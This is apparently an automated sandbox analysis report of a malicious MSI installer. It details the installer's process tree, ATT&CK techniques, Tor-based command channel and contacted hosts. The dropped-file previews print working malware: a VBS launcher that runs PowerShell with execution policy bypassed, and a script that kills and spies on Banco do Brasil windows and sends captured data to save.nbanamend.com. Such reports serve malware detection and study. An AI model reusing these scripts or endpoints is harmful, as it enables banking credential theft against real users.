Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\JQHPQS\MRZANK.exeQueries volume information: C:\JQHPQS\AZJVGE VolumeInformation
Source: C:\JQHPQS\MRZANK.exeQueries volume information: C:\ProgramData\hscore\hs_ed25519_secret_key VolumeInformation
Source: C:\JQHPQS\MRZANK.exeQueries volume information: C:\ProgramData\hscore\hs_ed25519_public_key VolumeInformation
Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_077AF01C CreateNamedPipeW,23_2_077AF01C

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Replication Through Removable Media1Scripting111Startup Items1Startup Items1Scripting111Input Capture1Peripheral Device Discovery11Replication Through Removable Media1Archive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsCommand and Scripting Interpreter1DLL Side-Loading1DLL Side-Loading1Obfuscated Files or Information1LSASS MemoryFile and Directory Discovery2Remote Desktop ProtocolInput Capture1Exfiltration Over BluetoothEncrypted Channel11Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsPowerShell4Registry Run Keys / Startup Folder12Process Injection13Timestomp1Security Account ManagerSystem Information Discovery13SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Registry Run Keys / Startup Folder12DLL Side-Loading1NTDSQuery Registry1Distributed Component Object ModelInput CaptureScheduled TransferMulti-hop Proxy1SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptFile Deletion1LSA SecretsSecurity Software Discovery1SSHKeyloggingData Transfer Size LimitsNon-Application Layer Protocol2Manipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonMasquerading21Cached Domain CredentialsProcess Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelApplication Layer Protocol13Jamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion21DCSyncVirtualization/Sandbox Evasion21Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolProxy2Rogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection13Proc FilesystemApplication Window Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowRemote System Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 527489 Sample: YwZpT3p5Rh.msi Startdate: 23/11/2021 Architecture: WINDOWS Score: 72 75 Found Tor onion address 2->75 77 May use the Tor software to hide its network traffic 2->77 79 Sigma detected: Change PowerShell Policies to a Unsecure Level 2->79 81 Sigma detected: Suspicious Script Execution From Temp Folder 2->81 10 msiexec.exe 21 46 2->10         started        13 wscript.exe 2->13         started        16 msiexec.exe 2 2->16         started        process3 file4 59 C:\Windows\Installer\MSIFCD8.tmp, PE32 10->59 dropped 61 C:\Windows\Installer\MSIE39F.tmp, PE32 10->61 dropped 63 C:\Windows\Installer\MSIE275.tmp, PE32 10->63 dropped 65 14 other files (none is malicious) 10->65 dropped 18 msiexec.exe 8 10->18         started        89 Wscript starts Powershell (via cmd or directly) 13->89 22 MRZANK.exe 13->22         started        signatures5 process6 file7 45 C:\Users\user\AppData\Local\...\scrFDAD.txt, Little-endian 18->45 dropped 47 C:\Users\user\AppData\Local\...\scrFDAC.ps1, Little-endian 18->47 dropped 49 C:\Users\user\AppData\Local\...\pssFF45.ps1, Little-endian 18->49 dropped 83 Bypasses PowerShell execution policy 18->83 24 powershell.exe 21 40 18->24         started        signatures8 process9 dnsIp10 73 save.nbanamend.com 104.21.91.13, 443, 49770 CLOUDFLARENETUS United States 24->73 51 C:\JQHPQS\zlib1.dll, PE32 24->51 dropped 53 C:\JQHPQS\tor.exe, PE32 24->53 dropped 55 C:\JQHPQS\tor-gencert.exe, PE32 24->55 dropped 57 11 other malicious files 24->57 dropped 85 Powershell creates an autostart link 24->85 87 Powershell drops PE file 24->87 29 wscript.exe 24->29         started        32 conhost.exe 24->32         started        file11 signatures12 process13 signatures14 91 Wscript starts Powershell (via cmd or directly) 29->91 34 MRZANK.exe 29->34         started        37 powershell.exe 29->37         started        process15 dnsIp16 67 205.185.127.35, 49775, 9100 PONYNETUS United States 34->67 69 213.226.71.164, 49788, 9001 MELBICOM-EU-ASMelbikomasUABNL Germany 34->69 71 4 other IPs or domains 34->71 39 conhost.exe 34->39         started        41 conhost.exe 37->41         started        43 powershell.exe 37->43         started        process17

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
YwZpT3p5Rh.msi2%VirustotalBrowse
YwZpT3p5Rh.msi2%ReversingLabs

Dropped Files

SourceDetectionScannerLabelLink
C:\JQHPQS\MRZANK.exe (copy)0%MetadefenderBrowse
C:\JQHPQS\MRZANK.exe (copy)0%ReversingLabs
C:\JQHPQS\QRROJT.exe (copy)2%ReversingLabs
C:\JQHPQS\capturador.exe2%ReversingLabs
C:\JQHPQS\libcrypto-1_1.dll0%MetadefenderBrowse
C:\JQHPQS\libcrypto-1_1.dll0%ReversingLabs
C:\JQHPQS\libevent-2-1-7.dll3%MetadefenderBrowse
C:\JQHPQS\libevent-2-1-7.dll0%ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
https://$domain/new.php?data=$dataEnc0%Avira URL Cloudsafe
https://save.nbanamend.com/new.php?data=138727%7cuser%7cNo%7c23%2f11%2f2021+21%3a060%Avira URL Cloudsafe
https://contoso.com/0%URL Reputationsafe
https://freehaven.net/anonbib/#hs-attack060%VirustotalBrowse
https://freehaven.net/anonbib/#hs-attack060%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
save.nbanamend.com
104.21.91.13
truefalse
    		high

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    https://save.nbanamend.com/new.php?data=138727%7cuser%7cNo%7c23%2f11%2f2021+21%3a06false
    • Avira URL Cloud: safe
    		unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://nuget.org/NuGet.exepowershell.exe, 00000017.00000002.544386978.0000000005944000.00000004.00000001.sdmpfalse
      		high
      https://2019.www.torproject.org/docs/faq.html.en#WarningsAboutSOCKSandDNSInformationLeaks.%sMRZANK.exe, 00000012.00000000.387394093.0000000000F46000.00000002.00020000.sdmpfalse
        		high
        https://2019.www.torproject.org/docs/faq.html.en#WarningsAboutSOCKSandDNSInformationLeaks.%sDANGEROUMRZANK.exe, 00000012.00000000.387394093.0000000000F46000.00000002.00020000.sdmpfalse
          		high
          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000005.00000002.397646642.0000000004640000.00000004.00000001.sdmp, powershell.exe, 00000017.00000002.535793950.0000000002BA6000.00000004.00000020.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000005.00000002.397646642.0000000004640000.00000004.00000001.sdmp, powershell.exe, 00000017.00000002.535793950.0000000002BA6000.00000004.00000020.sdmpfalse
            		high
            https://contoso.com/Licensepowershell.exe, 00000017.00000002.544386978.0000000005944000.00000004.00000001.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://contoso.com/Iconpowershell.exe, 00000017.00000002.544386978.0000000005944000.00000004.00000001.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://bugs.torproject.org/tpo/core/tor/21155.MRZANK.exe, 00000012.00000000.387394093.0000000000F46000.00000002.00020000.sdmpfalse
              		high
              https://www.torproject.org/MRZANK.exe, 00000012.00000000.387394093.0000000000F46000.00000002.00020000.sdmpfalse
                		high
                https://$domain/new.php?data=$dataEncpowershell.exe, 00000005.00000003.348135204.00000000074E4000.00000004.00000001.sdmptrue
                • Avira URL Cloud: safe
                		low
                https://bugs.torproject.org/tpo/core/tor/14917.MRZANK.exe, 00000012.00000000.387394093.0000000000F46000.00000002.00020000.sdmpfalse
                  		high
                  https://blog.torproject.org/v2-deprecation-timelineCalledMRZANK.exe, 00000012.00000000.387394093.0000000000F46000.00000002.00020000.sdmpfalse
                    		high
                    https://github.com/Pester/Pesterpowershell.exe, 00000005.00000002.397646642.0000000004640000.00000004.00000001.sdmp, powershell.exe, 00000017.00000002.535793950.0000000002BA6000.00000004.00000020.sdmpfalse
                      		high
                      https://blog.torproject.org/blog/lifecycle-of-a-new-relayMRZANK.exe, 00000012.00000000.387394093.0000000000F46000.00000002.00020000.sdmpfalse
                        		high
                        https://blog.torproject.org/v2-deprecation-timelineMRZANK.exe, 00000012.00000000.387394093.0000000000F46000.00000002.00020000.sdmpfalse
                          		high
                          https://www.torproject.org/download/download#warningalphabetaThisMRZANK.exe, 00000012.00000000.387394093.0000000000F46000.00000002.00020000.sdmpfalse
                            		high
                            http://mingw-w64.sourceforge.net/XMRZANK.exe, 00000012.00000002.547207485.00000000691A2000.00000008.00020000.sdmpfalse
                              		high
                              http://www.zlib.net/DMRZANK.exe, 00000012.00000002.550461147.000000006B464000.00000008.00020000.sdmpfalse
                                		high
                                https://blog.torproject.org/blog/lifecycle-of-a-new-relayCanMRZANK.exe, 00000012.00000000.387394093.0000000000F46000.00000002.00020000.sdmpfalse
                                  		high
                                  https://www.torproject.org/documentation.htmlMRZANK.exe, 00000012.00000000.387394093.0000000000F46000.00000002.00020000.sdmpfalse
                                    		high
                                    https://contoso.com/powershell.exe, 00000017.00000002.544386978.0000000005944000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://nuget.org/nuget.exepowershell.exe, 00000017.00000002.544386978.0000000005944000.00000004.00000001.sdmpfalse
                                      		high
                                      https://www.openssl.org/HMRZANK.exe, 00000012.00000002.546580931.0000000069123000.00000008.00020000.sdmpfalse
                                        		high
                                        https://freehaven.net/anonbib/#hs-attack06MRZANK.exe, 00000012.00000000.387394093.0000000000F46000.00000002.00020000.sdmpfalse
                                        • 0%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://www.torproject.org/download/download#warningMRZANK.exe, 00000012.00000000.387394093.0000000000F46000.00000002.00020000.sdmpfalse
                                          		high
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000005.00000002.397419806.0000000004501000.00000004.00000001.sdmpfalse
                                            		high
                                            https://bugs.torproject.org/tpo/core/tor/8742.MRZANK.exe, 00000012.00000000.387394093.0000000000F46000.00000002.00020000.sdmpfalse
                                              		high
                                              https://www.torproject.org/docs/faq.html#BestOSForRelayMRZANK.exe, 00000012.00000000.387394093.0000000000F46000.00000002.00020000.sdmpfalse
                                                		high

                                                Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public

                                                IPDomainCountryFlagASNASN NameMalicious
                                                95.211.136.23
                                                		unknownNetherlands
                                                		60781LEASEWEB-NL-AMS-01NetherlandsNLfalse
                                                88.99.32.114
                                                		unknownGermany
                                                		24940HETZNER-ASDEfalse
                                                213.226.71.164
                                                		unknownGermany
                                                		56630MELBICOM-EU-ASMelbikomasUABNLfalse
                                                185.14.97.36
                                                		unknownCyprus
                                                		41801DATAFON-ASNTRfalse
                                                104.21.91.13
                                                		save.nbanamend.comUnited States
                                                		13335CLOUDFLARENETUSfalse
                                                205.185.127.35
                                                		unknownUnited States
                                                		53667PONYNETUSfalse

                                                Private

                                                IP
                                                127.0.0.1

                                                General Information

                                                Joe Sandbox Version:34.0.0 Boulder Opal
                                                Analysis ID:527489
                                                Start date:23.11.2021
                                                Start time:20:59:28
                                                Joe Sandbox Product:CloudBasic
                                                Overall analysis duration:0h 15m 10s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Sample file name:YwZpT3p5Rh.msi
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                Number of analysed new started processes analysed:35
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • HDC enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Detection:MAL
                                                Classification:mal72.evad.winMSI@27/90@1/7
                                                EGA Information:Failed
                                                HDC Information:Failed
                                                HCA Information:Failed
                                                Cookbook Comments:
                                                • Adjust boot time
                                                • Enable AMSI
                                                • Found application associated with file extension: .msi
                                                Warnings:
                                                Show All
                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                                                • Excluded IPs from analysis (whitelisted): 20.54.110.249
                                                • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, client.wns.windows.com, fs.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report creation exceeded maximum time and may have missing behavior and disassembly information.
                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • Report size getting too big, too many NtSetInformationFile calls found.

                                                Simulations

                                                Behavior and APIs

                                                TimeTypeDescription
                                                21:01:07API Interceptor542x Sleep call for process: powershell.exe modified
                                                21:01:31AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\upspur.lnk

                                                Joe Sandbox View / Context

                                                IPs

                                                No context

                                                Domains

                                                No context

                                                ASN

                                                No context

                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                No context

                                                Created / dropped Files

                                                C:\Config.Msi\3ed8e0.rbs
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):2534
                                                Entropy (8bit):5.467334681181493
                                                Encrypted:false
                                                SSDEEP:48:o1VI5ARdGx93TR96EuwE4wSv+t6EIp9qvb:oc5AOTu/lcQ
                                                MD5:D1EBAEF38BBD92FA323CB8FA90B0908A
                                                SHA1:89FB91570E30C67414D83709FCDEE85230154769
                                                SHA-256:E57AAF74B5670AA6AB9BF9EF08EAEA5322379DC338367545DBAE5A5CA7109BCD
                                                SHA-512:56292EFFBB8364EBB4E9C59975EB87B66063D5343BCA73F38567BBCB5F1B953AC82AE50D7EFAF558C005E04F18F8D4EBCB8F0BE2F3C8136323D6DFCDE3E942BA
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: ...@IXOS.@.....@..wS.@.....@.....@.....@.....@.....@......&.{06F68BF0-637D-4106-89BA-F09C8D12ADAA}..Leitor..YwZpT3p5Rh.msi.@.....@..-..@.....@........&.{2E1E2189-2426-4422-848B-7807DE130F24}.....@.....@.....@.....@.......@.....@.....@.......@......Leitor......Rollback..A.....o. .d.e. .r.e.s.t.a.u.r.a.....o.....RollbackCleanup..Removendo arquivos de backup..Arquivo: [1]....ProcessComponents%.Atualizando o registro de componentes..&.{A01EEA68-8EB3-45E6-A279-AE2135F94188}&.{06F68BF0-637D-4106-89BA-F09C8D12ADAA}.@......&.{0786B0D2-2694-4535-8058-0D8685B9AAD7}&.{06F68BF0-637D-4106-89BA-F09C8D12ADAA}.@......&.{CC477C94-8417-4703-8FC1-093E5F91DFCD}&.{06F68BF0-637D-4106-89BA-F09C8D12ADAA}.@......&.{149D3DBD-9682-4CCE-8D17-5F80A80F4433}&.{06F68BF0-637D-4106-89BA-F09C8D12ADAA}.@......&.{4DB31090-FD14-4084-844F-1D28D846239A}&.{06F68BF0-637D-4106-89BA-F09C8D12ADAA}.@......&.{44339CEF-A92B-4BBC-ACF4-CFBB4836D2C9}&.{06F68BF0-637D-4106-89BA-F09C8D12ADAA}.@......&.{A95353E3-616C-45A6-8795-CBFC63ECC6D8
                                                C:\JQHPQS\AZJVGE
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):93
                                                Entropy (8bit):4.709535392630383
                                                Encrypted:false
                                                SSDEEP:3:+snDHNu5ICkRENBov+snDH6wyVov3pRvy:+snTNu581nTDyCvZRa
                                                MD5:FFF5F1A728740ED0D126837E9E8FF116
                                                SHA1:77F745AA4A2B17B262095A93DB8D6681C95E9260
                                                SHA-256:A6DD0C6F283B1FFF9DCA4DDC58426F5D066EE2F970AFC2289EC2928FC41778AC
                                                SHA-512:3EAD2D98BA9963BCF43A76F1F153DB119BD7F7AFABBF0A3DE0A605B08058A1FB9C56B325DA3BDD46682D368EA990369798C5DFE911C245C8793BA50A4BAD236E
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: HiddenServiceDir C:\ProgramData\hscore..HiddenServicePort 1001 127.0.0.1:30900..SocksPort 0..
                                                C:\JQHPQS\ECSGNO.vbs
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):241
                                                Entropy (8bit):5.3591166922483655
                                                Encrypted:false
                                                SSDEEP:6:FERtbFHmcdR2sTKJytbFHsnytGQO0cg8scpLACsrwyu:+RtRE7stRsnGHpcUBrwX
                                                MD5:CF4BFCE60D83A01A356C21703C21C107
                                                SHA1:E65F38055CCB09777739336ABC6BF89F59662D63
                                                SHA-256:9F8ABECAA058222D71572A32A862FB0D32447632A6B144C75296266D20D976F6
                                                SHA-512:2A5D9D17B1D828606AED23AFB6433464D6537F1B6A8008006F190311D2F5D5628A185E21732770199832423A4E513CCF86D2FFFD69A21433D122330E084A8999
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: CreateObject("Wscript.Shell").Run "C:\JQHPQS\MRZANK.exe -f C:\JQHPQS\AZJVGE", 0, False..CreateObject("Wscript.Shell").Run "powershell.exe -ExecutionPolicy ByPass -File C:\JQHPQS\QIZABC.ps1 C:\JQHPQS\QRROJT.exe save.nbanamend.com", 0, False..
                                                C:\JQHPQS\MRZANK.exe (copy)
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                Category:dropped
                                                Size (bytes):4229632
                                                Entropy (8bit):6.445770642858094
                                                Encrypted:false
                                                SSDEEP:98304:nQcSbHtBsdxf/78Xd1U7hFndQI7yPr5L9E:QXHtBsPj8XdwndQIm
                                                MD5:67AB12CF6CABC14588E4F51B21C2134A
                                                SHA1:32A4FF564F38BF4B62007E419F19C991E60D6E14
                                                SHA-256:F0AAAE0364306BB7A4681D01935C96C2AC76B3576B7982990F86BCAF811A45BA
                                                SHA-512:2A1C67E9D23D6B050E35C5A8E159309CF598095239406C60A9F721FDDC912E21AFAB7036CBD9F77197CC4241DF5F8FA6AA9D7294762659178C6EDEB4699D5BEC
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Metadefender, Detection: 0%, Browse
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                Reputation:unknown
                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.........................0...@..^............0...@..........................0A.....|9A...@... ...............................>..5...........................0?.0............................?;.....................,.>.(............................text...$.0.......0.................`.P`.data........0.......0.............@.`..rdata.......`1......L1.............@.`@.bss.....]...p>.......................`..idata...5....>..6...\>.............@.0..CRT....4.....?.......>.............@.0..tls......... ?.......>.............@.0..reloc..0....0?.......>.............@.0B................................................................................................................................................................................................................................................................................................................
                                                C:\JQHPQS\QIZABC.ps1 (copy)
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):1688
                                                Entropy (8bit):5.279662107471557
                                                Encrypted:false
                                                SSDEEP:48:Dxc+6tOtDN95xLoXU8+IDp9frUr4KS692MEX+uCZGYiRIiGLaDr+:DxdpN34VSNsiZGY9yX+
                                                MD5:DD2C9A2529B9DB000E30FE0331F6FFAA
                                                SHA1:B7B89DC1E05479D421153EF5109DC72319C3943E
                                                SHA-256:EEF8C513B78DBE60D5FD2793052F7B29151B96D53A513BF6F2A27AB205A64B14
                                                SHA-512:E359DF6B0B7774E32522BF66932E4DD9561A5CBEA9F982369AB52FB1D51A4B7AD4AD5BAE6747717E126B6B14AB0018AA88B7EFB105E37CA6BCBDE140F60140F9
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: Add-Type -AssemblyName System.Web....$capturerFileName = $args[0]....$domain = $args[1]....Start-Job -ArgumentList $capturerFileName,$(Get-Location) -ScriptBlock {...$capturerProcess = $null......for(;;) {....$processList = Get-Process | Select-Object Id,MainWindowTitle.......foreach($process in $processList) {.....$title = $process.MainWindowTitle.........if ($title -like "*Banco do Brasil*") {.........Stop-Process -Id $process.Id -Force............#............if (!($capturerProcess -eq $null)) {.......Stop-Process -Id $capturerProcess.Id -Force......}............#............$capturerProcess = Start-Process -FilePath $args[0] -WorkingDirectory $args[1] -PassThru...........break.....}....}.......Start-Sleep -Milliseconds 100...}..}....#....$dataPath = "data"..$data = ""....For (;$data -eq "";) {....if (Test-Path -Path $dataPath) {....$data = Get-Content -Path $dataPath...}......Start-Sleep -Milliseconds 100..}....#....$onionHostPath = "$($env:ProgramData)\hscore\hostname"..$onionHost
                                                C:\JQHPQS\QRROJT.exe (copy)
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):34304
                                                Entropy (8bit):6.5790668137555635
                                                Encrypted:false
                                                SSDEEP:384:SLGDDCVC75uC3KBLvc1+YPL2jyKvDZOzkcchbWKWXnIaBxopdhxrZNar6xrZNnDH:Z7wFvDckvhQXIVLzar8nDpNbQGB4/BG
                                                MD5:53FC515F425A2CDC9DADF1E139BC142B
                                                SHA1:B63CA1ABAB256B1619DA7DF994497E9F063F6713
                                                SHA-256:DABA783C0B0E47CE3096CA6661E785467B5EB45147DD29C09B77C6B18B7A3D7E
                                                SHA-512:FD91F97825A19C105A1304BC969CEEC33AF89614AA4CAC3C6BF75F3362CCB41C167431493BEBE8CA428FBA587E8089B9EAB7473148009AD9F8DE1A95093C3B1D
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 2%
                                                Reputation:unknown
